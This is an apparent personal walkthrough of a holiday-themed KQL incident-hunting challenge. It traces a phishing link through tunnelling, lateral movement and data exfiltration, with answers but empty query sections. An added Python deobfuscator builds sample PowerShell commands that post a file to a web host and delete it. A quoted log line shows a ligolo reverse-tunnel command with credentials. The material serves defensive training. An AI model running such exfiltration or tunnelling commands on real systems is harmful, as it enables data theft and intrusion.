KQL Kraken Hunt

Tools/Skills: KQL, Incident Investigation, Log Analysis, Decoding Base64-Encoded PowerShell Commands

SYNOPSIS

An alert is generated that a malicious link was clicked on by an employee.

I found the email with the malicious link and documented the sender and receiver of the email. I then identified the victim's role, hostname and IP address. From there, I found the log showing that the victim had clicked on the link and when he clicked it, and then found a file that was subsequently downloaded onto his computer. Next, I found that the attacker had created a remote tunnel and then enumerated network shares. The attacker later used a network share to move laterally within the environment. After the lateral movement, the attacker ran 3 Base64-encoded PowerShell commands. I decoded these commands and found that the attacker transferred a file out of the system and then deleted the file from the compromised host.

While this challenge did not cover escalation, at this point, if not before, I would escalate the alert according to the company's playbook.

SOLUTION & PROCESS

ONBOARDING

  1. How many Craftperson Elf's are working from laptops?

    QUERIES:

    ANSWER:

    25

CASE 1

Track down who sent and who received the malicious link, as well as the subject line of the email containing the malicious link: 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

QUERIES

RESULT

SENT: cwombley@gmail.com

RECEIVED: alabaster_snowball@santaworkshopgeeseislands.org

SUBJECT LINE: “[EXTERNAL] Invoice foir reindeer food past due”

CASE 2

Find the role, hostname and IP address of the victim.

QUERIES:

RESULT:

IP ADDRESS: 10.10.0.4

ROLE: Head Elf

HOSTNAME: Y1US-DESKTOP

CASE 3

What time did the victim click on the link? Were any files downloaded after he clicked on it?

QUERY 1 (time):

RESULT 1 (time):

QUERY 2 (downloaded file):

RESULT 2 (downloaded file):

TIME (OF CLICK): 2023-12-02 10:12:42.0000

DOWNLOADED FILE NAME: giftwrap.exe

CASE 4

Where did the attacker create a remote tunnel to? When did the attacker enumerate network shares? Which hostname did the attacker move laterally to?

Endpoint IP address of the created remote tunnel

QUERY

RESULT:

REMOTE TUNNEL IP ADDRESS: 113.37.9.17

Time & Hostname

QUERY:

RESULT 1 (TIME when attacker enumerated network shares):

RESULT 2 (Hostname of lateral movement)

TIME (OF ENUMERATED NETWORK SHARES): 2023-12-02T16:51:44Z

HOSTNAME (OF LATERAL MOVEMENT): NorthPolefileshare

CASE 5

Find the Base64-encoded PowerShell commands, then find the name of the file that was transferred and where it was sent.

QUERY

RESULT

FURTHER STEPS

  1. I decoded the three Base64-encoded strings (I had initially counted four) in PowerShell.

  2. One of the decoded messages was written in reverse, so I reversed it, with some help from AI, which revealed the file name.

  3. A second "decoded" message was almost all numbers, which I thought was strange, so I sent it to ChatGPT. ChatGPT worked out how it was encoded and decoded it, showing me the domain the file was sent to.

TIME (OF FIRST ATTACK): 2023-12-24T16:07:47Z

*NOTE: there was an encoded PowerShell command before this one, but it was a basic update, not indicative of an attack.

FILE TRANSFERRED: NaughtyNiceList.txt

DOMAIN (WHERE FILE WAS SENT): giftbox.com
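The three decoding layers described above (the -enc Base64/UTF-16LE wrapper, a string written in reverse, and a "message that was almost all numbers", i.e. a [char[]] code array) can be undone without an AI assistant. The following is an added example, not part of the original write-up or the challenge data: the three sample blobs are constructed from the file name, user name and domain reported above, and the reversed-path and char-code heuristics are assumptions that cover the two obfuscation tricks this write-up ran into.

```python
import base64
import re

def decode_powershell_enc(b64: str) -> str:
    """powershell.exe -enc takes Base64 of the UTF-16LE script; that blob is what shows up in process_commandline."""
    raw = base64.b64decode(b64)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")  # some encoders skip the UTF-16 step

# A run of 4+ comma-separated small integers: the "almost all numbers" layer, a [char[]] code array.
CHARCODE_RE = re.compile(r"(?:\d{1,3}\s*,\s*){3,}\d{1,3}")
QUOTED_RE = re.compile(r"'([^']*)'|\"([^\"]*)\"")
LOOKS_FORWARD = re.compile(r"^(?:[A-Za-z]:\\|https?://|\\\\)")  # drive path, URL or UNC path

def decode_charcodes(text: str) -> str:
    """Replace each char-code run with the characters it spells."""
    return CHARCODE_RE.sub(lambda m: "".join(chr(int(n)) for n in m.group(0).split(",")), text)

def unreverse_literals(text: str) -> str:
    """Reverse a quoted literal when it only reads as a path/URL backwards (the reversed-string layer)."""
    def fix(m):
        s = m.group(1) if m.group(1) is not None else m.group(2)
        q = m.group(0)[0]
        return f"{q}{s[::-1]}{q}" if LOOKS_FORWARD.match(s[::-1]) else m.group(0)
    return QUOTED_RE.sub(fix, text)

def deobfuscate(b64: str) -> str:
    return unreverse_literals(decode_charcodes(decode_powershell_enc(b64)))

def extract_iocs(script: str) -> dict:
    """Pull file paths and contacted hosts out of a decoded script."""
    return {"paths": re.findall(r'''[A-Za-z]:\\[^\s'"]+''', script),
            "hosts": re.findall(r'''https?://([^/\s'"]+)''', script)}

def ps_encode(plain: str) -> str:
    """Build a -enc blob the way PowerShell does; used only to construct the samples below."""
    return base64.b64encode(plain.encode("utf-16-le")).decode("ascii")

# Constructed stand-ins for the three encoded commands (not the challenge's real payloads).
TARGET = r"C:\Users\alsnowball\Desktop\NaughtyNiceList.txt"
EXFIL = "Invoke-WebRequest -Uri https://giftbox.com/upload -Method Post -InFile $p"
SAMPLES = {
    "reversed": ps_encode(f"$f = '{TARGET[::-1]}'; $p = -join $f[-1..-($f.Length)]"),
    "charcodes": ps_encode("[string]::Join('', [char[]](" + ",".join(str(ord(c)) for c in EXFIL) + "))"),
    "cleanup": ps_encode(f"Remove-Item -Path '{TARGET}' -Force"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        script = deobfuscate(blob)
        print(f"[{name}] {script}\n    IOCs: {extract_iocs(script)}")
```

In a real investigation the blob is the argument after -enc (or -EncodedCommand) in the process_commandline field returned by the KQL query, and the extracted paths and hosts are what gets escalated.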

CASE 6

Determine the executable and command flag

QUERY

*I used the previous query.

RESULT

EXECUTABLE: downwithsanta.exe

COMMAND FLAG: --wipeall


Example Prompts:

  • What signs would there be that a reverse tunnel connection with a compromised machine is made? Where would I find the IP the connection forwarded to? (Using KQL)

  • What is the timestamp when the attackers enumerated network shares on the machine?

  • What process names would be indicative of this?

  • Is this a reverse tunnel connection?

    {
      "timestamp": "2023-12-02T11:11:29Z",
      "parent_process_name": "cmd.exe",
      "parent_process_hash": "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f",
      "process_commandline": "\"ligolo\" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof",
      "process_name": "ligolo",
      "process_hash": "e9b34c42e29a349620a1490574b87865cc1571f65aa376b928701a034e6b3533",
      "hostname": "Y1US-DESKTOP",
      "username": "alsnowball"
    }
